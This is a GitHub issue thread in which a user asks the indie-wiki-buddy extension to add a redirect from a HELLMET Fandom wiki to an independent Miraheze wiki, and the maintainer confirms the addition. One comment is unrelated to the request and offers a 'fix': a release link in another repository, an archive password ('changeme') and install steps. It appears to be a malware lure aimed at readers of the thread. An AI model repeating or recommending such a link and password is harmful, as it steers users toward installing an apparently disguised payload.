### ISSUE TITLE
Add a wiki: HELLMET Wiki

### ISSUE THREAD

**Issue by wolf653** [KevinPayravi/indie-wiki-buddy#804]
Link to origin wiki: https://hellmet-roblox.fandom.com
Link to destination (independent) wiki: https://hellmet.miraheze.org

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KevinPayravi** [comment]
Thank you for the submission! The wiki has been added in `v3.11.0` (available for Chrome, soon to be available on Firefox).
